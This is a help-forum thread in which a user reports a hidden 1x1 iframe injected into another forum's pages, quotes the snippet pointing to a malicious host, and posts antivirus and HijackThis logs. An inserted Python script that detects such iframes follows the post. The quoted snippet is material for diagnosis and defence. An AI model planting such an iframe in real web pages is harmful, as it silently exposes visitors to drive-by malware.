
Possible infection

  • 29-11-2009 9:34pm
    #1
    Closed Accounts Posts: 5,017 ✭✭✭


    Hi, on Saturday morning I was browsing another forum when the site was attacked. The attack took the form of injecting code for an iframe into the forum pages. The code was:
    </table> 
    <!-- / forum rules & forum jump --> 
     
    <iframe width=1 height=1 border=0 frameborder=0 src="http://centiyo.com/in.cgi?default"></iframe> 
     
    <br /> 
    <div class="smallfont" align="center">All times are GMT -5. The time now is <span class="time">10:12 PM</span>.</div> 
    <br />
    

    I was using Mozilla SeaMonkey to browse and on first visiting the site I noticed that the Java icon was loaded in my taskbar. This would not usually happen on this forum.

    Many other users' anti-virus programs reported a threat, but mine, Microsoft Security Essentials, did not.

    AVG reported:

    File name: http://centiyo.com/in.cgi?default\{gzip}
    Malware Name: HTML:RedirME-inf [Trj]

    File Name: http://fuc*thecrisis.biz/lib/index.php
    Threat Name: Exploit Javascript Obfuscation (type 714)

    I'm now concerned that I may have picked up an infection. I ran MBAM and SUPERAntiSpyware and they came up clean, but the Kaspersky online scanner picked up an infection.

    Also I found a file called yearsTend.class in the Java control panel Temporary Files. It came from http://fuc*thecrisis.biz/lib/yearsTend.class

    Here are the log files of the scans I've done:

    KASPERSKY ONLINE SCANNER 7.0: scan report
    Sunday, November 29, 2009
    Operating system: Microsoft Windows Vista Home Premium Edition, 32-bit Service Pack 2 (build 6002)
    Kaspersky Online Scanner version: 7.0.26.13
    Last database update: Sunday, November 29, 2009 02:01:28
    Records in database: 3306136

    Scan settings:
    scan using the following database: extended
    Scan archives: yes
    Scan e-mail databases: yes

    Scan area - My Computer:
    C:\
    D:\
    E:\
    F:\
    G:\
    H:\
    I:\

    Scan statistics:
    Objects scanned: 189752
    Threats found: 2
    Infected objects found: 2
    Suspicious objects found: 0
    Scan duration: 01:50:36


    File name / Threat / Threats count
    C:\Users\Lennon\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\20\60c48694-1ccd8d4f Infected: Trojan-Downloader.Java.Agent.ab 1
    C:\Users\Lennon\Desktop\default\hnvp2lue.slt\Mail\Local Folders\College Inbox Infected: Email-Worm.Win32.Wallon.a 1

    Selected area has been scanned.


    Malwarebytes' Anti-Malware 1.41
    Database version: 3258
    Windows 6.0.6002 Service Pack 2

    29/11/2009 20:08:50
    mbam-log-2009-11-29 (20-08-50).txt

    Scan type: Quick Scan
    Objects scanned: 109216
    Time elapsed: 3 minute(s), 29 second(s)

    Memory Processes Infected: 0
    Memory Modules Infected: 0
    Registry Keys Infected: 0
    Registry Values Infected: 0
    Registry Data Items Infected: 0
    Folders Infected: 0
    Files Infected: 0

    Memory Processes Infected:
    (No malicious items detected)

    Memory Modules Infected:
    (No malicious items detected)

    Registry Keys Infected:
    (No malicious items detected)

    Registry Values Infected:
    (No malicious items detected)

    Registry Data Items Infected:
    (No malicious items detected)

    Folders Infected:
    (No malicious items detected)

    Files Infected:
    (No malicious items detected)


    Logfile of Trend Micro HijackThis v2.0.2
    Scan saved at 20:10:36, on 29/11/2009
    Platform: Windows Vista SP2 (WinNT 6.00.1906)
    MSIE: Internet Explorer v8.00 (8.00.6001.18828)
    Boot mode: Normal

    Running processes:
    C:\Windows\system32\Dwm.exe
    C:\Windows\Explorer.EXE
    C:\Windows\system32\taskeng.exe
    C:\Program Files\Dell Support Center\bin\sprtcmd.exe
    C:\Program Files\COMODO\Firewall\cfp.exe
    C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
    C:\Windows\RtHDVCpl.exe
    C:\Program Files\Microsoft Security Essentials\msseces.exe
    C:\Program Files\iTunes\iTunesHelper.exe
    C:\Program Files\Java\jre6\bin\jusched.exe
    C:\Windows\ehome\ehtray.exe
    C:\Windows\ehome\ehmsas.exe
    C:\Program Files\SABnzbd\SABnzbd.exe
    C:\Program Files\AutoHotkey\AutoHotkey.exe
    C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
    C:\Program Files\Mozilla Thunderbird\thunderbird.exe
    C:\Program Files\SeaMonkey\seamonkey.exe
    C:\Program Files\Mozilla Firefox\firefox.exe
    C:\Windows\system32\NOTEPAD.EXE
    C:\Program Files\Malwarebytes' Anti-Malware\mbam.exe
    C:\Windows\system32\NOTEPAD.EXE
    C:\Windows\system32\SearchFilterHost.exe
    C:\Users\Lennon\Desktop\HijackThis.exe

    R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
    R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.ie/
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
    R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
    R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
    R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
    R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Internet Explorer provided by Dell
    R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
    R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
    O1 - Hosts: ::1 localhost
    O2 - BHO: Shareaza Web Download Hook - {0EEDB912-C5FA-486F-8334-57288578C627} - C:\Program Files\Shareaza\RazaWebHook32.dll
    O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - (no file)
    O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
    O2 - BHO: Browser Address Error Redirector - {CA6319C0-31B7-401E-A518-A07C3DB8F777} - C:\Program Files\Dell\BAE\BAE.dll
    O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
    O4 - HKLM\..\Run: [Windows Defender] %ProgramFiles%\Windows Defender\MSASCui.exe -hide
    O4 - HKLM\..\Run: [StartCCC] "C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" MSRun
    O4 - HKLM\..\Run: [dscactivate] "C:\Program Files\Dell Support Center\gs_agent\custom\dsca.exe"
    O4 - HKLM\..\Run: [DellSupportCenter] "C:\Program Files\Dell Support Center\bin\sprtcmd.exe" /P DellSupportCenter
    O4 - HKLM\..\Run: [COMODO Firewall Pro] "C:\Program Files\COMODO\Firewall\cfp.exe" -h
    O4 - HKLM\..\Run: [AppleSyncNotifier] C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleSyncNotifier.exe
    O4 - HKLM\..\Run: [RtHDVCpl] RtHDVCpl.exe
    O4 - HKLM\..\Run: [COMODO Internet Security] "C:\Program Files\COMODO\Firewall\cfp.exe" -h
    O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\QTTask.exe" -atboottime
    O4 - HKLM\..\Run: [MSSE] "c:\Program Files\Microsoft Security Essentials\msseces.exe" -hide
    O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
    O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre6\bin\jusched.exe"
    O4 - HKCU\..\Run: [DellSupportCenter] "C:\Program Files\Dell Support Center\bin\sprtcmd.exe" /P DellSupportCenter
    O4 - HKCU\..\Run: [ehTray.exe] C:\Windows\ehome\ehTray.exe
    O4 - HKCU\..\Run: [Google Update] "C:\Users\Lennon\AppData\Local\Google\Update\GoogleUpdate.exe" /c
    O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'LOCAL SERVICE')
    O4 - HKUS\S-1-5-19\..\Run: [WindowsWelcomeCenter] rundll32.exe oobefldr.dll,ShowWelcomeCenter (User 'LOCAL SERVICE')
    O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'NETWORK SERVICE')
    O4 - HKUS\S-1-5-21-1411996874-1301283773-3185572280-1003\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'postgres')
    O4 - Global Startup: SABnzbd.lnk = C:\Program Files\SABnzbd\SABnzbd.exe
    O4 - Global Startup: WindowPad.ahk.lnk = C:\AHK\WindowPad\WindowPad.ahk
    O8 - Extra context menu item: Download with &Shareaza - res://C:\Program Files\Shareaza\RazaWebHook32.dll/3000
    O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~3\OFFICE11\EXCEL.EXE/3000
    O9 - Extra button: Titan Poker - {49783ED4-258D-4f9f-BE11-137C18D3E543} - C:\Poker\Titan Poker\casino.exe
    O9 - Extra 'Tools' menuitem: Titan Poker - {49783ED4-258D-4f9f-BE11-137C18D3E543} - C:\Poker\Titan Poker\casino.exe
    O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~3\OFFICE11\REFIEBAR.DLL
    O9 - Extra button: CDPoker - {A68FC757-51CF-4f3c-B13A-BFB8CA69BB99} - C:\Poker\CDPoker\casino.exe
    O9 - Extra 'Tools' menuitem: CDPoker - {A68FC757-51CF-4f3c-B13A-BFB8CA69BB99} - C:\Poker\CDPoker\casino.exe
    O9 - Extra button: Gnuf Poker - {A99C8F70-4D5B-482c-8854-05BC0BB8B182} - C:\Gnuf\Poker\MPPoker.exe
    O9 - Extra button: Noble Poker - {B723B1B8-9788-4684-ADA7-D1DB02E1D516} - C:\Poker\Noble Poker\casino.exe
    O9 - Extra 'Tools' menuitem: Noble Poker - {B723B1B8-9788-4684-ADA7-D1DB02E1D516} - C:\Poker\Noble Poker\casino.exe
    O9 - Extra button: PartyPoker.com - {B7FE5D70-9AA2-40F1-9C6B-12A255F085E1} - C:\Programs\PartyGaming\PartyPoker\RunApp.exe
    O9 - Extra 'Tools' menuitem: PartyPoker.com - {B7FE5D70-9AA2-40F1-9C6B-12A255F085E1} - C:\Programs\PartyGaming\PartyPoker\RunApp.exe
    O9 - Extra button: Purple Lounge - {00000000-0000-0000-0000-000000000000} - C:\MicroGaming\Poker\PurpleLoungeMPP\MPPoker.exe (HKCU)
    O9 - Extra button: CarbonPoker - {e4e8c758-34b4-44bb-8ef9-1f0786e81d2d} - C:\Users\Lennon\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\CarbonPoker\CarbonPoker.lnk (file missing) (HKCU)
    O13 - Gopher Prefix:
    O16 - DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} - http://download.eset.com/special/eos/OnlineScanner.cab
    O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
    O16 - DPF: {D8089245-3211-40F6-819B-9E5E92CD61A2} (FlashXControl Object) - https://mppv2flash3.valueactive.com/PokerShare/FlashAX.cab
    O16 - DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} - http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
    O17 - HKLM\System\CCS\Services\Tcpip\..\{019BBC51-493A-48CD-8901-399505DA1F8B}: NameServer = 62.231.32.10,62.231.32.11,4.2.2.1,4.2.2.2
    O17 - HKLM\System\CS1\Services\Tcpip\..\{019BBC51-493A-48CD-8901-399505DA1F8B}: NameServer = 62.231.32.10,62.231.32.11,4.2.2.1,4.2.2.2
    O17 - HKLM\System\CS2\Services\Tcpip\..\{019BBC51-493A-48CD-8901-399505DA1F8B}: NameServer = 62.231.32.10,62.231.32.11,4.2.2.1,4.2.2.2
    O20 - AppInit_DLLs: C:\Windows\system32\guard32.dll
    O20 - Winlogon Notify: !SASWinLogon - C:\Program Files\SUPERAntiSpyware\SASWINLO.dll
    O23 - Service: Andrea RT Filters Service (AERTFilters) - Andrea Electronics Corporation - C:\Windows\system32\AERTSrv.exe
    O23 - Service: AMD External Events Utility - AMD - C:\Windows\system32\atiesrxx.exe
    O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
    O23 - Service: Bonjour Service - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
    O23 - Service: COMODO Internet Security Helper Service (cmdAgent) - COMODO - C:\Program Files\COMODO\Firewall\cmdagent.exe
    O23 - Service: DSBrokerService - Unknown owner - C:\Program Files\DellSupport\brkrsvc.exe
    O23 - Service: Google Update Service (gupdate1c9e852b942f080) (gupdate1c9e852b942f080) - Google Inc. - C:\Program Files\Google\Update\GoogleUpdate.exe
    O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
    O23 - Service: PostgreSQL Server 8.3 (postgresql-8.3) - PostgreSQL Global Development Group - C:/Program Files/PostgreSQL/8.3/bin/pg_ctl.exe
    O23 - Service: Remote Packet Capture Protocol v.0 (experimental) (rpcapd) - CACE Technologies, Inc. - C:\Program Files\WinPcap\rpcapd.exe
    O23 - Service: SupportSoft Sprocket Service (dellsupportcenter) (sprtsvc_dellsupportcenter) - SupportSoft, Inc. - C:\Program Files\Dell Support Center\bin\sprtsvc.exe
    O23 - Service: stllssvr - MicroVision Development, Inc. - C:\Program Files\Common Files\SureThing Shared\stllssvr.exe
    O23 - Service: TVersityMediaServer - Unknown owner - C:\Users\Lennon\AppData\Local\TVersity\Media Server\MediaServer.exe

    --
    End of file - 9277 bytes


    Rooter.exe (v1.0.2) by Eric_71
    .
    SeDebugPrivilege granted successfully ...
    .
    Windows Vista Home Edition (6.0.6002) Service Pack 2
    [32_bits] - x86 Family 6 Model 15 Stepping 11, GenuineIntel
    .
    [wscsvc] (Security Center) RUNNING (state:4)
    [MpsSvc] RUNNING (state:4)
    Windows Firewall -> Disabled !
    Windows Defender -> Disabled !
    User Account Control (UAC) -> Disabled !
    .
    Internet Explorer 8.0.6001.18828
    Mozilla Firefox 3.5.5 (en-GB)
    .
    C:\ [Fixed-NTFS] .. ( Total:239 Go - Free:92 Go )
    D:\ [Fixed-NTFS] .. ( Total:9 Go - Free:5 Go )
    E:\ [CD_Rom]
    F:\ [Removable]
    G:\ [Removable]
    H:\ [Removable]
    I:\ [Removable]
    .
    Scan : 20:11.25
    Path : C:\Users\Lennon\Desktop\Rooter.exe
    User : Lennon ( Administrator -> YES )
    .
    \\ Processes
    .
    Locked [System Process] (0)
    Locked System (4)
    ______ \SystemRoot\System32\smss.exe (536)
    ______ C:\Windows\system32\csrss.exe (604)
    ______ C:\Windows\system32\wininit.exe (668)
    ______ C:\Windows\system32\csrss.exe (680)
    ______ C:\Windows\system32\services.exe (712)
    ______ C:\Windows\system32\lsass.exe (724)
    ______ C:\Windows\system32\lsm.exe (732)
    ______ C:\Windows\system32\svchost.exe (884)
    ______ C:\Windows\system32\winlogon.exe (896)
    ______ C:\Windows\system32\svchost.exe (968)
    ______ C:\Program Files\COMODO\Firewall\cmdagent.exe (1008)
    ______ C:\Windows\system32\svchost.exe (1056)
    ______ c:\Program Files\Microsoft Security Essentials\MsMpEng.exe (1076)
    ______ C:\Windows\system32\atiesrxx.exe (1280)
    ______ C:\Windows\System32\svchost.exe (1328)
    ______ C:\Windows\System32\svchost.exe (1372)
    ______ C:\Windows\system32\svchost.exe (1384)
    Locked audiodg.exe (1476)
    ______ C:\Windows\system32\svchost.exe (1500)
    ______ C:\Windows\system32\SLsvc.exe (1520)
    ______ C:\Windows\system32\svchost.exe (1548)
    ______ C:\Windows\system32\atieclxx.exe (1704)
    ______ C:\Windows\System32\spoolsv.exe (1964)
    ______ C:\Windows\system32\svchost.exe (1996)
    ______ C:\Windows\system32\taskeng.exe (1316)
    ______ C:\Windows\system32\Dwm.exe (1720)
    ______ C:\Windows\Explorer.EXE (352)
    ______ C:\Windows\system32\taskeng.exe (2084)
    ______ C:\Program Files\Google\Update\1.2.183.13\GoogleCrashHandler.exe (2192)
    ______ C:\Program Files\Dell Support Center\bin\sprtcmd.exe (2336)
    ______ C:\Program Files\COMODO\Firewall\cfp.exe (2344)
    ______ C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe (2448)
    ______ C:\Windows\RtHDVCpl.exe (2524)
    ______ C:\Program Files\Microsoft Security Essentials\msseces.exe (2612)
    ______ C:\Program Files\iTunes\iTunesHelper.exe (2624)
    ______ C:\Program Files\Java\jre6\bin\jusched.exe (2632)
    ______ C:\Windows\ehome\ehtray.exe (2648)
    ______ C:\Windows\system32\AERTSrv.exe (2828)
    ______ C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe (2840)
    ______ C:\Program Files\Bonjour\mDNSResponder.exe (2852)
    ______ C:\Windows\ehome\ehmsas.exe (3216)
    ______ C:\Program Files\SABnzbd\SABnzbd.exe (3228)
    ______ C:\Program Files\AutoHotkey\AutoHotkey.exe (3244)
    ______ C:\Windows\System32\svchost.exe (3360)
    ______ C:\Windows\system32\svchost.exe (3372)
    ______ C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe (3656)
    ______ C:\Program Files\PostgreSQL\8.3\bin\pg_ctl.exe (3784)
    ______ C:\Program Files\Dell Support Center\bin\sprtsvc.exe (3800)
    ______ C:\Windows\system32\svchost.exe (3816)
    ______ C:\Windows\System32\svchost.exe (3892)
    ______ C:\Windows\system32\SearchIndexer.exe (3912)
    ______ C:\Program Files\PostgreSQL\8.3\bin\postgres.exe (4072)
    ______ C:\Windows\system32\WUDFHost.exe (2532)
    ______ C:\Program Files\PostgreSQL\8.3\bin\postgres.exe (2792)
    ______ C:\Program Files\PostgreSQL\8.3\bin\postgres.exe (1556)
    ______ C:\Program Files\PostgreSQL\8.3\bin\postgres.exe (2992)
    ______ C:\Program Files\PostgreSQL\8.3\bin\postgres.exe (3076)
    ______ C:\Program Files\iPod\bin\iPodService.exe (3432)
    ______ C:\Windows\system32\SearchProtocolHost.exe (1464)
    ______ C:\Program Files\Mozilla Thunderbird\thunderbird.exe (5376)
    ______ C:\Program Files\SeaMonkey\seamonkey.exe (4708)
    ______ C:\Program Files\Mozilla Firefox\firefox.exe (6056)
    ______ C:\Windows\system32\NOTEPAD.EXE (1664)
    ______ C:\Program Files\Malwarebytes' Anti-Malware\mbam.exe (5120)
    ______ C:\Windows\system32\NOTEPAD.EXE (4836)
    ______ C:\Windows\system32\SearchFilterHost.exe (4796)
    ______ C:\Users\Lennon\Desktop\HijackThis.exe (2996)
    ______ C:\Windows\system32\wbem\wmiprvse.exe (5476)
    ______ C:\Windows\system32\NOTEPAD.EXE (1204)
    ______ C:\Users\Lennon\Desktop\Rooter.exe (1092)
    .
    \\ Device\Harddisk0\
    .
    \Device\Harddisk0 [Sectors : 63 x 512 Bytes]
    .
    \Device\Harddisk0\Partition1 (Start_Offset:32256 | Length:73995264)
    \Device\Harddisk0\Partition2 (Start_Offset:74448896 | Length:10737418240)
    \Device\Harddisk0\Partition3 --[ MBR ]-- (Start_Offset:10811867136 | Length:256830865408)
    \Device\Harddisk0\Partition0 (Start_Offset:267642732544 | Length:52428800000)
    \Device\Harddisk0\Partition4 (Start_Offset:267643781120 | Length:52427751424)
    .
    \\ Scheduled Tasks
    .
    C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
    C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
    C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1411996874-1301283773-3185572280-1001Core.job
    C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1411996874-1301283773-3185572280-1001UA.job
    C:\Windows\Tasks\SA.DAT
    C:\Windows\Tasks\SCHEDLGU.TXT
    .
    \\ Registry
    .
    .
    \\ Files & Folders
    .
    \\ Scan completed at 20:11.39
    .
    C:\Rooter$\Rooter_1.txt - (29/11/2009 | 20:11.39)

    I would be grateful if someone could tell me if these look ok. Thanks in advance.
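
The fragment quoted at the top of this post is a textbook drive-by redirector: a 1x1 iframe with no border, pointing at a host that has nothing to do with the forum. The script below is an added example (not code from the original post, the forum software or any of the tools in the logs) that audits a page for iframes of that shape: tiny or CSS-hidden frames, off-site `src` hosts, and `javascript:`/`data:` sources. It reuses the quoted fragment as a constructed sample and assumes the page being checked is served from `forum.example.org`; that hostname, `audit_iframes` and `IframeAuditor` are the example's own names.

```python
"""Flag hidden or off-site <iframe> elements of the kind injected into forum pages."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: the injected fragment quoted in the post, wrapped in a
# minimal page, plus one ordinary same-site embed that must NOT be flagged.
SAMPLE_HTML = """<html><body>
</table>
<!-- / forum rules & forum jump -->
<iframe width=1 height=1 border=0 frameborder=0 src="http://centiyo.com/in.cgi?default"></iframe>
<iframe src="/embed/legit" width="640" height="360"></iframe>
<br />
<div class="smallfont" align="center">All times are GMT -5.</div>
</body></html>"""

PAGE_HOST = "forum.example.org"  # assumed host of the page under inspection


def _size(value):
    """Integer pixel size from a width/height attribute ('1', '1px', '100%'), or None."""
    if value is None:
        return None
    digits = "".join(ch for ch in str(value) if ch.isdigit())
    return int(digits) if digits else None


class IframeAuditor(HTMLParser):
    """Collect every <iframe> together with the reasons it looks like a redirector."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)  # unquoted values such as width=1 arrive as the string "1"
        reasons = []

        # A 0x0 or 1x1 frame is invisible to the user: the classic drive-by pattern.
        w, h = _size(a.get("width")), _size(a.get("height"))
        if w is not None and h is not None and w <= 1 and h <= 1:
            reasons.append("tiny frame (%dx%d)" % (w, h))

        # Frames hidden with inline CSS serve the same purpose.
        style = (a.get("style") or "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden by CSS")

        # Content pulled from a host other than the page's own is worth a look;
        # relative URLs have no hostname and are treated as same-site.
        src = a.get("src") or ""
        host = urlparse(src).hostname
        if host and host.lower() != self.page_host:
            reasons.append("off-site src host %s" % host)

        if src.strip().lower().startswith(("javascript:", "data:")):
            reasons.append("scripted src")

        if reasons:
            self.findings.append({"src": src, "reasons": reasons})


def audit_iframes(html, page_host=PAGE_HOST):
    """Return a list of {'src', 'reasons'} dicts, one per suspicious iframe."""
    parser = IframeAuditor(page_host)
    parser.feed(html)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    for finding in audit_iframes(SAMPLE_HTML):
        print(finding["src"], "->", "; ".join(finding["reasons"]))
```

Run against the sample, only the `centiyo.com` frame is reported, with both the 1x1 geometry and the foreign host given as reasons; the 640x360 same-site embed passes. A real deployment would feed it the rendered HTML of each page (the injection here sat in the footer template, so any page of the forum would have tripped it) and compare against a list of hosts the site legitimately embeds.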


Comments

  • Closed Accounts Posts: 1,970 ✭✭✭ActorSeeksJob


    looks ok

    Please download DDS and save it to your desktop.
    • Disable any script blocking protection
    • Double click dds.pif to run the tool.
    • When done, two DDS.txts will open.
    • Save both reports to your desktop.


    Please include the contents of the following in your next reply:

    DDS.txt
    Attach.txt.


  • Closed Accounts Posts: 5,017 ✭✭✭tsue921i8wljb3


    Thanks very much for the quick response. Here are the requested files:


    DDS (Ver_09-11-29.01) - NTFSx86
    Run by Lennon at 0:10:26.94 on 30/11/2009
    Internet Explorer: 8.0.6001.18828 BrowserJavaVersion: 1.6.0_17
    Microsoft® Windows Vista™ Home Premium 6.0.6002.2.1252.353.1033.18.3069.1420 [GMT 0:00]

    SP: COMODO Defense+ *enabled* (Updated) {043803A4-4F86-4ef7-AFC5-F6E02A79969B}
    SP: Windows Defender *enabled* (Updated) {D68DDC3A-831F-4FAE-9E44-DA132C1ACF46}
    SP: SUPERAntiSpyware *disabled* (Updated) {222A897C-5018-402e-943F-7E7AC8560DA7}
    FW: COMODO Firewall *enabled* {043803A3-4F86-4ef6-AFC5-F6E02A79969B}

    ============== Running Processes ===============

    C:\Windows\system32\wininit.exe
    C:\Windows\system32\lsm.exe
    C:\Windows\system32\svchost.exe -k DcomLaunch
    C:\Windows\system32\svchost.exe -k rpcss
    C:\Program Files\COMODO\Firewall\cmdagent.exe
    C:\Windows\system32\svchost.exe -k NetworkService
    c:\Program Files\Microsoft Security Essentials\MsMpEng.exe
    C:\Windows\system32\atiesrxx.exe
    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
    C:\Windows\system32\svchost.exe -k netsvcs
    C:\Windows\system32\svchost.exe -k GPSvcGroup
    C:\Windows\system32\SLsvc.exe
    C:\Windows\system32\svchost.exe -k LocalService
    C:\Windows\system32\atieclxx.exe
    C:\Windows\System32\spoolsv.exe
    C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
    C:\Windows\system32\taskeng.exe
    C:\Windows\system32\Dwm.exe
    C:\Windows\Explorer.EXE
    C:\Windows\system32\taskeng.exe
    C:\Program Files\Google\Update\1.2.183.13\GoogleCrashHandler.exe
    C:\Program Files\COMODO\Firewall\cfp.exe
    C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
    C:\Windows\RtHDVCpl.exe
    C:\Program Files\Microsoft Security Essentials\msseces.exe
    C:\Program Files\iTunes\iTunesHelper.exe
    C:\Program Files\Java\jre6\bin\jusched.exe
    C:\Windows\ehome\ehtray.exe
    C:\Windows\system32\AERTSrv.exe
    C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
    C:\Program Files\Bonjour\mDNSResponder.exe
    C:\Windows\ehome\ehmsas.exe
    C:\Program Files\SABnzbd\SABnzbd.exe
    C:\Program Files\AutoHotkey\AutoHotkey.exe
    C:\Windows\System32\svchost.exe -k HPZ12
    C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
    C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
    C:\Program Files\PostgreSQL\8.3\bin\pg_ctl.exe
    C:\Program Files\Dell Support Center\bin\sprtsvc.exe
    C:\Windows\system32\svchost.exe -k imgsvc
    C:\Windows\System32\svchost.exe -k WerSvcGroup
    C:\Windows\system32\SearchIndexer.exe
    C:\Program Files\PostgreSQL\8.3\bin\postgres.exe
    C:\Windows\system32\WUDFHost.exe
    C:\Program Files\PostgreSQL\8.3\bin\postgres.exe
    C:\Program Files\PostgreSQL\8.3\bin\postgres.exe
    C:\Program Files\PostgreSQL\8.3\bin\postgres.exe
    C:\Program Files\PostgreSQL\8.3\bin\postgres.exe
    C:\Program Files\iPod\bin\iPodService.exe
    C:\Program Files\SeaMonkey\seamonkey.exe
    C:\Program Files\Mozilla Firefox\firefox.exe
    C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe
    C:\Windows\system32\SearchProtocolHost.exe
    C:\Windows\system32\SearchFilterHost.exe
    c:\Program Files\Microsoft Security Essentials\MpCmdRun.exe
    C:\Users\Lennon\Desktop\dds.pif
    C:\Windows\system32\conime.exe
    C:\Windows\system32\wbem\wmiprvse.exe

    ============== Pseudo HJT Report ===============

    uStart Page = hxxp://www.google.ie/
    uWindow Title = Internet Explorer provided by Dell
    uInternet Settings,ProxyOverride = *.local
    BHO: Shareaza Web Download Hook: {0eedb912-c5fa-486f-8334-57288578c627} - c:\program files\shareaza\RazaWebHook32.dll
    BHO: {5C255C8A-E604-49b4-9D64-90988571CECB} - No File
    BHO: Windows Live Sign-in Helper: {9030d464-4c02-4abf-8ecc-5164760863c6} - c:\program files\common files\microsoft shared\windows live\WindowsLiveLogin.dll
    BHO: CBrowserHelperObject Object: {ca6319c0-31b7-401e-a518-a07c3db8f777} - c:\program files\dell\bae\BAE.dll
    BHO: Java(tm) Plug-In 2 SSV Helper: {dbc80044-a445-435b-bc74-9c25c1c588a9} - c:\program files\java\jre6\bin\jp2ssv.dll
    uRun: [DellSupportCenter] "c:\program files\dell support center\bin\sprtcmd.exe" /P DellSupportCenter
    uRun: [ehTray.exe] c:\windows\ehome\ehTray.exe
    uRun: [Google Update] "c:\users\lennon\appdata\local\google\update\GoogleUpdate.exe" /c
    mRun: [Windows Defender] %ProgramFiles%\Windows Defender\MSASCui.exe -hide
    mRun: [StartCCC] "c:\program files\ati technologies\ati.ace\core-static\CLIStart.exe" MSRun
    mRun: [dscactivate] "c:\program files\dell support center\gs_agent\custom\dsca.exe"
    mRun: [DellSupportCenter] "c:\program files\dell support center\bin\sprtcmd.exe" /P DellSupportCenter
    mRun: [COMODO Firewall Pro] "c:\program files\comodo\firewall\cfp.exe" -h
    mRun: [AppleSyncNotifier] c:\program files\common files\apple\mobile device support\bin\AppleSyncNotifier.exe
    mRun: [RtHDVCpl] RtHDVCpl.exe
    mRun: [COMODO Internet Security] "c:\program files\comodo\firewall\cfp.exe" -h
    mRun: [QuickTime Task] "c:\program files\quicktime\QTTask.exe" -atboottime
    mRun: [MSSE] "c:\program files\microsoft security essentials\msseces.exe" -hide
    mRun: [iTunesHelper] "c:\program files\itunes\iTunesHelper.exe"
    mRun: [SunJavaUpdateSched] "c:\program files\java\jre6\bin\jusched.exe"
    StartupFolder: c:\progra~2\micros~1\windows\startm~1\programs\startup\sabnzbd.lnk - c:\program files\sabnzbd\SABnzbd.exe
    StartupFolder: c:\progra~2\micros~1\windows\startm~1\programs\startup\window~1.lnk - c:\ahk\windowpad\WindowPad.ahk
